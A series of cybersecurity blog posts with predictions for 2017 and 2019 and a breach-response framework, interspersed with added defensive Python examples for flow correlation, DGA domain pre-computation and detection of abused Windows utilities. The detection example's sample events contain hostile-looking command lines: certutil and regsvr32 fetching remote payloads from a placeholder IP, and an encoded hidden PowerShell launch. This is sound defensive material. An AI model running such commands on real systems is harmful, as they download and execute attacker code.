Sunday, December 30, 2018

Cybersecurity Predictions and a Wish List for 2019

© 2018 Bob Carver, CISM, CISSP, M.S.
As in recent years, cyber threats will continue to get worse before they get better. Those who think “good enough” security or risk management will suffice will be sorely disappointed by the large gaps they leave open for cybercriminals and nation-state actors to easily breach and compromise their enterprise.
  • Cybercrime as a Service (CaaS) will continue to increase. There is no need to be a malware/exploit writer yourself if you can simply buy or rent. It is much easier to set up a cybercrime business than it is to open a corner store in your neighborhood. Just open an appropriate cryptocurrency account and make your payment to your cybercrime vendor of choice. Their customer support and malware/exploit guarantees will rival, if not beat, the best premium, legitimate software vendors.
  • We will continue to see increased manipulation of standard processes and utilities to compromise systems, manipulate data and exfiltrate it. This includes escalating privileges to run the processes that most endpoint security products whitelist. To the average user, and to the endpoint agent, it will all look legitimate; it will be malicious.
  • We will start seeing more machine learning malware that plays games with machine learning endpoint and intrusion detection algorithms to avoid detection. This will result in “My machine learning is better than your machine learning.” You can guess who will often win.
  • Intrusion detection systems will continue to lose visibility into data flows and malicious activity because of encryption. Gartner has already predicted that in 2019, 80% of all traffic will be encrypted and 70% of malicious traffic will be encrypted. Will we be ready to detect what is happening inside those encrypted, obfuscated traffic flows?
  • IoT (Internet of Things) wreaking security havoc is not going away. Consumer routers, webcams, security cameras and other Internet connected consumer goods continue to have poor or marginal security. I predicted in 2016 these problems would arise even before Mirai, Hide ‘n Seek, Gafgyt and the like. Unless people, organizations and manufacturers are held to some level of responsibility, we will have more of the same.
  • Insurers may be less likely to pay cyber insurance claims. Of course they want and need to be profitable. There are multiple areas of your cyber insurance policy you might want to review with a fine-tooth comb. Recently one insurer denied claims related to NotPetya infections, asserting that they fell under an Act of War or Force Majeure exclusion. Additional clarifications and negotiations probably need to take place in that area. Next, verify you have the people, processes and technology in place that your policy requires, and then check the fine print for exclusions.
  • One or more businesses may have to claim bankruptcy or cease to exist (at least in their current form) due to overwhelming expenses that are required as a result of a major breach.
  • The autonomous machine learning bots are coming. At least one or more proofs of concept have been tested and refined. This means that little or no traditional command and control (North-South, Internet) traffic is needed to execute reconnaissance, exploitation and complete exfiltration; or, worse yet, to destroy or manipulate data. No more telltale beaconing of C2 traffic. Monitoring of files and processes, whether on disk or in memory, and visibility into East-West traffic will be necessary now more than ever.
  • Security scores for companies are a work in progress. Just as FICO or credit scores have been in place for decades in an attempt to measure credit risk, security scores will eventually be utilized for third-party risk, supply chain risk, mergers and acquisitions, overall corporate risk and pricing models for cyber insurance.
  • “Good enough security” will eventually be seen for what it really is “Not Good Enough.” Underestimating your adversary will eventually be seen as naive and “penny pinching will be exposed as pound foolish.” Third-party partner risk, mergers and acquisitions and insurance underwriting will eventually be affected by the business entity’s perceived or actual risk. Due to this additional clarity of risk, those that are deemed a higher risk may be forced to pay for that risk.
  • Firmware/hardware and side channel attacks will happen at the nation-state and high-end cybercriminal level. This will put more pressure on designing better Zero Trust hardware roots such as the TPM (Trusted Platform Module). Unfortunately, with current hardware and operating systems, these attacks may be relatively invisible.
  • New record fines will be assessed for breaches related to GDPR.
  • Some major supply chains and/or third party corporate partners will be breached and will wreak havoc for all the entities that are interconnected or interdependent. This may create a new demand in cyber specialists to specifically focus on supply chain and third-party cyber-risk management.
  • Threat Hunting - in large corporations should be a top priority, since many threats are simply not seen by endpoint and intrusion detection systems. Not just searching for known, documented threats, but searching for the unknown. Complete logs, processes, changes and data flows (North-South and East-West) are needed. Ideally, each data flow should be correlated to a process on the endpoint, whether on disk or in memory.
Wish List
  • Secure our voting systems and back all votes with paper ballots. Anyone, regardless of party, living in a real democracy should want a voting system that cannot easily be rigged to change votes by whoever has access to the vulnerable voting machines. At the DEF CON Voting Village in Las Vegas this year, an 11-year-old altered vote totals on a replica of a state election-results website within minutes. Known possible manipulation is often not investigated and is swept under the rug. In the meantime, while we are re-inventing a more secure system, we need to stop handing over the source code of these voting machines to foreign entities that may want to manipulate the end results of our elections.
  • Establish in law who is responsible for the security of IoT and who must take appropriate action when things go wrong. At present no one is taking responsibility. There needs to be a delineation of responsibility between the following:
- The owner of IoT
- The manufacturer
- The ISP
- The government
  • The Boardroom needs to increase its knowledge of, and involvement in, overseeing cybersecurity risk management and cyber resilience. A static check-box mentality doesn’t work in this extremely dynamic attack environment. Dynamic analysis through frameworks such as the NIST CSF needs to be utilized. The qualitative attributes of the NIST CSF are not easily translated into a consistent, quantifiable model that can be used for benchmarking, and it will not be easy to agree on a consistent way to measure across institutions, industries, market verticals and business sizes. Essentially, “one size” does not fit all. Risk optimization is closer to being fitted for a custom-tailored suit than to reporting a series of standardized checkboxes with weighted ratings.
2019 and beyond will no doubt be interesting for all of us, stretching those that will be attempting to adapt to this increasingly dynamic threat environment and may be harsh for those that are settling for “good enough” security.

Thursday, July 20, 2017

Cybersecurity: The Need for SPEED


If you look at a range of recent security industry reports, you’ll see varying times quoted for how long it takes criminals and bad actors to exploit your network and exfiltrate data, and how long it takes to discover and remediate a breach. On average, though, the numbers look something like this:
  • Time to compromise: minutes, if not seconds.
  • Time to exfiltrate data: days, if not weeks.
  • Time to discover or identify the breach: often months, if not years.
Of course, there are a lot of factors that impact these times, including the maturity of the organization, employee education programs (or lack thereof), headcount, and the people, processes, and technology you have in place.
It can also depend on how quickly response teams work together when an incident occurs. As pointed out in the Ponemon Institute’s 2017 annual “Cost of a Data Breach Study,” rapid response drives down the cost of a data breach. According to this report, “Failure to quickly identify the data breach increases costs. If the MTTI (Mean Time to Identify) breach was less than 100 days, the total cost was $2.8 million. If it was over 100 days, the estimated cost was $3.83 million.”
It’s clear that when it comes to security, time is of the essence. To help you prioritize, here’s a handy acronym you can share with your teams when it comes to your cyber security initiatives:
S – Situational Awareness
P – Patching (Cyber Hygiene)
E – Evolve Continuously
E – Event Monitoring
D – Detection

Situational Awareness

What is situational awareness?  One source defines it as “[…] the perception of an enterprise’s security posture and its threat environment; the comprehension/meaning of both taken together (risk); and the projection of their status into the near future.”
Some of the questions you need to answer to determine your situational awareness include:
  • Do you know where and what your vulnerabilities are in your people and processes? Do you have a plan to mitigate them? Does that plan include timelines or training?
  • Have you conducted penetration testing to detect weak points in your network? Do you have a plan to address any issues found?
  • If compromised, do you have a plan in place to address it quickly? When was the last time that plan was reviewed or tested?
  • Are your cyber security teams and your business continuity or disaster recovery teams joined at the hip?

Patching (Cyber Hygiene)

While zero-day vulnerabilities often make headlines, malicious hackers more commonly exploit vulnerabilities that have already been disclosed. For example, many businesses (including a Honda manufacturing plant and some hospitals) had their operations interrupted by the WannaCry ransomware worm, which spread through a Windows SMB vulnerability that Microsoft had patched roughly two months earlier; they simply hadn’t applied the known patch quickly enough. Running patch updates monthly won’t cut it. Desktops should be updated as soon as patches are released; that is your first line of defense. Server patches may take a bit longer, as they may require time for testing to verify that functionality isn’t affected. In the case of operating systems that are no longer supported, like older versions of Windows, users must be migrated to newer ones that are, or a plan developed to migrate them if an immediate move isn’t practical.

Evolve Continuously

Your people, processes, and technology must constantly evolve. You don’t want to be one of those organizations that gets notified of a compromise by law enforcement before your security teams are aware of the situation.
Here are some important questions to consider in measuring your security maturity:
  • Are your people studying, getting education, and keeping up with current events and technology advancements?
  • Are your processes still valid? Do they need to be updated or modified?
  • When is the last time your systems were updated or upgraded?
  • Do you know if your current antivirus software can detect or mitigate exploits that run in memory? Is it time for an RFP for a new endpoint security product?

Event Monitoring

Continuous monitoring of events is a key factor of being able to discover a breach and react quickly.
Key questions you should consider include:
  • Can you easily detect malicious traffic?
  • Can you quickly identify endpoint changes?
  • Are you able to recognize if these changes are malicious or benign?
  • If the changes are malicious, is Endpoint Detection and Response (EDR) tooling available to contain and remediate them, or do you need to reimage the device?
  • Are you monitoring external traffic from your network to and from the Internet (C2 traffic) for malware and potential indicators of compromise?
  • Are you monitoring internal traffic? What potential malicious communication has taken place from one endpoint to another?
  • Are you monitoring your cloud applications, as well as devices and endpoints outside the company network?
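As an added example (not from the original post), here is how the correlation these Event Monitoring questions ask for, and which the 2019 predictions above call for when they discuss East-West traffic and threat hunting, can be done in practice: join flow records with an endpoint's socket-to-process table, then flag processes that fan out to several internal peers while producing no Internet traffic at all, the "no C2 beacon" pattern the 2019 post describes. The flow records, socket table, field names and the fan-out threshold are all constructed assumptions for this example, not any vendor's schema.

```python
"""Correlate East-West flows with the endpoint process that opened them.
Added example with constructed data; record layouts are assumptions."""
import ipaddress
from collections import defaultdict

# RFC 1918 ranges: used here to separate East-West (internal) from North-South (Internet) traffic.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def correlate(flows, sockets):
    """Join flows to processes on (source IP, source port).

    flows:   dicts with src, sport, dst, dport     (constructed flow records)
    sockets: dicts with host_ip, lport, pid, image (constructed endpoint socket table)
    returns: ({(host_ip, pid, image): {"east_west": {dst...}, "north_south": {dst...}}},
              [flows that could not be tied to any process])
    """
    index = {(s["host_ip"], s["lport"]): (s["pid"], s["image"]) for s in sockets}
    by_proc = defaultdict(lambda: {"east_west": set(), "north_south": set()})
    unattributed = []
    for f in flows:
        proc = index.get((f["src"], f["sport"]))
        if proc is None:
            unattributed.append(f)  # a flow with no endpoint record is itself a visibility gap
            continue
        key = (f["src"], *proc)
        bucket = "east_west" if is_internal(f["dst"]) else "north_south"
        by_proc[key][bucket].add(f["dst"])
    return dict(by_proc), unattributed


def hunt(by_proc, fanout=3):
    """Processes that reached >= fanout internal hosts and never touched the Internet."""
    return sorted(key for key, v in by_proc.items()
                  if len(v["east_west"]) >= fanout and not v["north_south"])


# Constructed endpoint socket table for one workstation (assumed field names).
SAMPLE_SOCKETS = [
    {"host_ip": "10.0.1.20", "lport": 49211, "pid": 4120, "image": "chrome.exe"},
    {"host_ip": "10.0.1.20", "lport": 49212, "pid": 4120, "image": "chrome.exe"},
    {"host_ip": "10.0.1.20", "lport": 49300, "pid": 3980, "image": "outlook.exe"},
    {"host_ip": "10.0.1.20", "lport": 50001, "pid": 5532, "image": "rundll32.exe"},
    {"host_ip": "10.0.1.20", "lport": 50002, "pid": 5532, "image": "rundll32.exe"},
    {"host_ip": "10.0.1.20", "lport": 50003, "pid": 5532, "image": "rundll32.exe"},
    {"host_ip": "10.0.1.20", "lport": 50004, "pid": 5532, "image": "rundll32.exe"},
]

# Constructed flow records (what a sensor or NetFlow export might hand you).
SAMPLE_FLOWS = [
    {"src": "10.0.1.20", "sport": 49211, "dst": "203.0.113.34", "dport": 443},
    {"src": "10.0.1.20", "sport": 49212, "dst": "198.51.100.7", "dport": 443},
    {"src": "10.0.1.20", "sport": 49300, "dst": "10.0.2.10", "dport": 443},
    {"src": "10.0.1.20", "sport": 50001, "dst": "10.0.1.21", "dport": 445},
    {"src": "10.0.1.20", "sport": 50002, "dst": "10.0.1.22", "dport": 445},
    {"src": "10.0.1.20", "sport": 50003, "dst": "10.0.1.23", "dport": 445},
    {"src": "10.0.1.20", "sport": 50004, "dst": "10.0.1.24", "dport": 445},
    {"src": "10.0.1.20", "sport": 50777, "dst": "10.0.1.25", "dport": 445},  # no socket record
]


def demo():
    by_proc, gaps = correlate(SAMPLE_FLOWS, SAMPLE_SOCKETS)
    return hunt(by_proc), gaps


if __name__ == "__main__":
    suspects, gaps = demo()
    for host, pid, image in suspects:
        print(f"{host} pid={pid} {image}: lateral fan-out with no Internet traffic")
    print(f"{len(gaps)} flow(s) could not be tied to a process")
```

The browser shows only North-South traffic and the mail client only one internal peer, so neither is flagged; the rundll32.exe instance talking SMB to four internal hosts with no Internet egress is. The unattributed flow is reported separately, because a flow you cannot tie to a process is exactly the visibility gap the text warns about. The fan-out threshold is a starting point to tune against your own baseline (backup agents and vulnerability scanners legitimately fan out).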

Detection

As we saw earlier in the Ponemon study, the faster that a data breach is detected, the more you can reduce costs and business impact. If you factor in the hours spared by your security team, as well as legal, public relations, operations, and other parts of the organization, the savings add up quickly. That time can be better spent growing your business and improving operations. By detecting breaches earlier, you can also better protect your brand reputation and maintain customer loyalty.

Summary

With an estimated 1.38 billion data records reported stolen in 2016 (roughly 43 records per second), putting the need-for-speed model into place can lead to a more mature security program that helps you save time and money over the long run.
Bob Carver made Klout’s Top 10 list of most recommended influencers to follow in #CyberSecurity and #infosec. You can follow him on Twitter: @cybersecboardrm. 

LinkedIn has announced he is among the Top 5 Cybersecurity Influencers to follow on the platform.
Copyright © 2017 Bob Carver CISM, CISSP, M.S.


Tuesday, January 10, 2017

Eleven Cybersecurity Predictions and a Wish List for 2017

Copyright © 2016 Bob Carver CISM, CISSP, M.S.

Let's start with some of things I got right in 2016:

IoT - This was #1 on my list of 2016 Predictions last year. The beginning of IoT security problems has been seen and felt this year. The Mirai botnet took down 85 websites for a good part of the day in various parts of the U.S., parts of the UK and the EU. These botnets also took two well-known websites offline for a large part of a day. Various reports of Internet interruption have been reported all over the world due to IoT botnet activity.
Signature-based AV and IDS - continue to be worth less in all computing environments and are unable to detect the vast majority of sophisticated malware.
Automation - is starting to be seen in several areas of information security; however, it has a way to go to fully integrate into monitoring, forensics and the incident response process.
Received a wish from last year's wish list:
UL-like certification - for security of various IoT or things that connect to the Internet. There are several organizations attempting to do this now.  If I was a betting man, I would put my money on Mudge Zatko’s project to have some of the best success.

Predictions 2017:

1. More issues with the IoT (Internet of Things) – Although the U.S. Congress was shocked at a recent hearing of the power of hijacked IoT, it still does not want to legislate IoT, the majority of users don’t know how to secure IoT and vendors/resellers may not be under any legal threat to take any action to better their products. This means more mischief or worse will take place in the coming year. If no one is held responsible, the malware writers and botnet herders will play (“wreak havoc”).
The Mirai botnet was just the tip of the iceberg. It was a relatively unsophisticated test just to see what could be accomplished. Just as we can only see the tip of an iceberg, the majority of the iceberg is submerged below water and has yet to be seen.
While we are on the subject of IoT, let’s put ICS (Industrial Control Systems), IIoT (Industrial Internet of Things) in this same risk bucket. Many of these devices can be hijacked similarly to IoT and cause major hurt for all networks and users involved.
The ICS and IIoT users/manufacturers have generally been more serious about securing their platforms in recent times; however, there are laggards and legacy systems that are still in need of shoring up their security.
The question still remains when and who will ultimately take responsibility for this mess?
2. Advanced Endpoint Security – If you haven’t purchased Advanced Endpoint Security yet, this is the year everyone should have an RFP out to upgrade their endpoint protection. All traditional AV is evaded with malware that has any level of sophistication. Cybercriminals are selling malware with guarantees that their malware will not be detected by any traditional AV.
3. Compliance to Insurance Standards vs. Compliance to traditional Cybersecurity Standards (NIST, ISO and the list goes on) – In the near future, your Cybersecurity Insurance provider will have the larger influence on what type of security defenses, detection, mitigation, people, processes and technology you will need to have in place. If you don’t follow their recommendations/guidelines, you either won’t be able to obtain insurance or your premiums and deductibles will be so high that it will most likely force you to abide. Note currently insurance companies can only assess relative risk by the industry a business is in. The statisticians/actuaries will be working night and day to be able to assess risk factor down to a much more granular level than categorizing the industry a business is in. Their job will not be easy since the risk factors can be extremely dynamic in nature.
4. Traditional IOCs (Indicators of Compromise) such as MD5/SHA256 hashes of malware, IP addresses, and URLs or domain names of botnet command and control servers may become less important. Why? Hashes change with minor modifications of code, making an almost infinite number of variants. URLs and domains can change daily, hourly or even by the minute. By the time all IOCs have been vetted and published, the game has changed and the last IOCs merely point to past, historical data. Given attacker dwell time, IOCs must be vetted and published as close to "real-time" as possible if they are to be of any value.
Of course, knowing IOCs in advance, for example by cracking DGAs (Domain Generation Algorithms) so that the domains a botnet will use tomorrow are known today, is also useful.
As a result, we need to put more weight on the TTPs (Tactics, Techniques and Procedures) used in cyberattacks and on how we will immediately recognize or block those attacks.
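The point in item 4 that a reverse-engineered DGA yields IOCs ahead of time can be shown concretely. The generator below is a constructed, date-seeded toy, not the algorithm of any real malware family, and the DNS log lines and their format are invented for this example (added here; not from the original post). Once the algorithm and seed have been recovered from a sample, the same code pre-computes every domain the malware will try over a window, so the names can be blocked or sinkholed before the attacker registers them and matched against DNS logs as lookups appear.

```python
"""Pre-compute a DGA's domains so tomorrow's C2 names are IOCs today.
Added example: the DGA, seed, and DNS log lines are all constructed."""
import datetime as dt
import hashlib

TLDS = ("com", "net", "org")


def toy_dga(day: dt.date, seed: bytes = b"example-seed", count: int = 8):
    """Derive `count` domains for `day` from a fixed seed.

    Constructed for illustration: real families differ, but the shape
    (secret seed + current date -> deterministic list of names) is typical.
    """
    domains = []
    for i in range(count):
        material = seed + day.isoformat().encode() + i.to_bytes(2, "big")
        digest = hashlib.sha256(material).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:12])
        domains.append(f"{label}.{TLDS[digest[12] % len(TLDS)]}")
    return domains


def precompute(start: dt.date, days: int, **dga_params) -> dict:
    """Map domain -> scheduled date for every name the DGA will use in the window."""
    table = {}
    for offset in range(days):
        day = start + dt.timedelta(days=offset)
        for domain in toy_dga(day, **dga_params):
            table[domain] = day
    return table


def hunt_dns(log_lines, table):
    """Return (client, domain, scheduled_day) for queries that hit pre-computed names.

    Log format is an assumption for the example: "<timestamp> <client> <qname> <qtype>".
    """
    hits = []
    for line in log_lines:
        client, qname = line.split()[1:3]
        qname = qname.rstrip(".").lower()
        if qname in table:
            hits.append((client, qname, table[qname]))
    return hits


START = dt.date(2019, 1, 1)
TABLE = precompute(START, 7)  # one week of domains, known before any is registered


def build_sample_log():
    """Constructed DNS log: benign lookups plus one lookup of a DGA name for 2019-01-03."""
    dga_name = toy_dga(START + dt.timedelta(days=2))[3]
    return [
        "2019-01-03T10:14:02Z 10.0.0.5 www.example.com. A",
        f"2019-01-03T10:14:07Z 10.0.0.5 {dga_name}. A",
        "2019-01-03T10:15:11Z 10.0.0.9 update.example.net. A",
    ]


if __name__ == "__main__":
    for client, domain, day in hunt_dns(build_sample_log(), TABLE):
        print(f"{client} queried {domain} (DGA day {day}); schedule sinkhole/block")
```

The lookup table is the deliverable: fed to a resolver blocklist or sinkhole it is valid for the whole window, which is the opposite of a hash or domain IOC that only describes what already happened. The same approach works for any family whose generator and inputs (seed, date, sometimes a public value such as a trending topic) you can reproduce.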
5. Malware, where is the malware?  
Yes, Kaspersky estimates there are 323,000 pieces of new malware each day, while VirusTotal recently saw 413,720 pieces of new malware in a single day. So why do I say "where is the malware?"
Fileless malware, exploit kits, memory-resident malware and abuse of legitimate operating system processes will continue to increase and be responsible for a larger portion of malicious activity. Hijacked legitimate processes, or simply using legitimate user credentials, will make it more difficult to determine whether a legitimate process is being used for good or for malicious ends. Note that most traditional antivirus products whitelist these processes, treating them as only ever doing good, legitimate work. Unfortunately, the cybercriminals have discovered that good, legitimate tools can also be used for nefarious purposes.
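An added example (mine, not the author's) of what item 5 above, and the 2019 prediction about manipulation of whitelisted utilities, imply for detection: instead of asking only whether an image is on an allow list, ask how a trusted binary was launched and with what arguments. The process-creation events, the rule set and its regular expressions are constructed for illustration and are meant as a starting point to tune against your own baseline.

```python
"""Flag abuse of trusted, normally-whitelisted Windows utilities from
process-creation telemetry. Added example; events and rules are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    parent: str   # parent image name, lower-case
    image: str    # child image name, lower-case
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Illustrative patterns: -e/-ec/-enc/-encodedcommand followed by a base64 blob,
# in-memory download cradles, and remote scriptlet/HTA loading.
PS_ENCODED = re.compile(r"(?i)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")
PS_DOWNLOAD = re.compile(r"(?i)downloadstring|invoke-webrequest|\biwr\b|net\.webclient")
CERTUTIL_FETCH = re.compile(r"(?i)-urlcache.*https?://")
REGSVR32_REMOTE = re.compile(r"(?i)/i:\s*https?://")
MSHTA_REMOTE = re.compile(r"(?i)https?://|javascript:|vbscript:")

# (rule name, images the rule applies to, predicate over (parent, cmdline))
RULES = [
    ("office_spawns_shell", SHELLS,
     lambda parent, cmd: parent in OFFICE_APPS),
    ("powershell_encoded_or_download", {"powershell.exe"},
     lambda parent, cmd: bool(PS_ENCODED.search(cmd) or PS_DOWNLOAD.search(cmd))),
    ("certutil_download", {"certutil.exe"},
     lambda parent, cmd: bool(CERTUTIL_FETCH.search(cmd))),
    ("regsvr32_remote_scriptlet", {"regsvr32.exe"},
     lambda parent, cmd: bool(REGSVR32_REMOTE.search(cmd))),
    ("mshta_remote", {"mshta.exe"},
     lambda parent, cmd: bool(MSHTA_REMOTE.search(cmd))),
]


def evaluate(events):
    """Return (rule_name, host, image, cmdline) for every rule each event trips."""
    hits = []
    for ev in events:
        for name, images, predicate in RULES:
            if ev.image in images and predicate(ev.parent, ev.cmdline):
                hits.append((name, ev.host, ev.image, ev.cmdline))
    return hits


# Constructed telemetry: two benign uses of the same binaries sit next to three abuses.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "alice", "explorer.exe", "powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
    ProcEvent("ws01", "alice", "winword.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent("ws02", "bob", "cmd.exe", "certutil.exe",
              "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\\Users\\bob\\a.txt"),
    ProcEvent("srv01", "svc_backup", "services.exe", "certutil.exe",
              "certutil.exe -hashfile C:\\backup\\image.vhd SHA256"),
    ProcEvent("ws03", "carol", "explorer.exe", "regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll"),
]


if __name__ == "__main__":
    for name, host, image, cmdline in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {host} {image}: {cmdline}")
```

Every binary in the sample is a legitimate, signed Windows utility that an allow list would pass; what separates the benign inventory script and backup hash check from the three abuses is the parent process and the command line. That is the TTP-level view item 4 argues for, and it keeps working when the payload's hash changes.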
6. Banking/Financial Sector – The famous question to a bank robber was, "Why do you rob banks?" The answer, “Because that is where the money is.” Various cybercrime schemes in the financial industry have been started by testing in the East and gradually moving their exploits to the West and most likely will not be slowing down any time in the near future.
Traditionally the goal for cybercriminals was simply to move cash from banks to their own accounts. New exploits to make money are being coded and executed every day.
Some recent trends that are bound to evolve and get more creative over time:
  • ATMs - exploit one ATM and be able to empty an entire network of ATMs.
  • Mobile banking apps – the mobile or app is compromised and the account is taken over by the cybercriminal.
  • One European bank that was often used to hide money from tax collectors was breached and its clients were blackmailed to ensure their tax evading plans were not revealed to the authorities.
  • Risk of malicious manipulation of ledgers and databases. 
If you can imagine a reasonable scenario, most likely it will be attempted.
7. The Cloud – The cloud is already one of the favorite methods for distributing malware. Enterprises are still honing their abilities to monitor, scan for vulnerabilities, lock down and protect the cloud. When cybercriminals take advantage of the cloud, then the enterprise will truly know their weaknesses, continuing to refine their monitoring, hardening and security practices.
8. Ransomware – will continue to grow; however, it may not be the traditional "encrypt your computer and demand bitcoin" for the decryption key. Cybercriminals will be concocting new business models and new platforms to execute them. Encryption is becoming old school. Data destruction, data manipulation, being locked out of digital platforms and old-fashioned blackmail could be some of those new criminal activities. It may go into the cloud, automobiles, IoT/IIoT/ICS and beyond.
9. Mobile – in spite of unending patches and upgrades the smartphone still is one of the most vulnerable platforms.  There has been progress; however, if the sophisticated actor wants to compromise your emails, texts, contacts or banking apps, they most likely will gain access. Blackberry was the king of secure phones for the longest time. Unfortunately, they did not keep up with consumer demands for modern, convenient apps and browsing the Internet. Let’s hope security is better embedded by design in the phones the general public purchases getting back to the level of security Blackberry was known for. Look for financial exploits and access to personal information.
10. Terrorists and Rogue Nations - will utilize traditional cybercriminal activities to raise money for their cause.  They have been losing ground in their land grabs. This may cause some of them to go virtual and get behind the keyboard.
11. Phishing and Social Engineering – Simply said, it is not going away. This is still one of the most popular ways that a perpetrator gains the initial foothold in a network. As long as they get a regular, small percentage return on their continued attempts, it is not going away. In the meantime defenders need to continue to raise the bar in their detection algorithms, possibly utilizing machine learning, because the cybercriminals will continue to raise the bar with their exploits.
Wishes for 2017, the New Year:
1. That everyone understands there is no more "set it and forget it" security programs that are sufficient to protect you. You must be dynamic to keep up with the attackers.
2. That some group ultimately takes responsibility for IoT/ICS security matters.
3. That threat intelligence platforms progress to make IOCs available as close to real-time as possible, and that TTPs become more important in threat intelligence and are made available more quickly.
4. That more IoT/IIoT/ICS be purchased that includes a warranty to support security patches for at least 5 years (or more) and forces users to change passwords (and ideally usernames) at initial login to the device.
5. Expiration dates on IoT/IIoT/ICS. If these devices have serious security flaws that can no longer be remediated, they should be forced to have an "end of life" date where they would be retired and taken out of service.
Remember, being compliant does not mean you are secure.
Everyone be vigilant and have a safe, great 2017!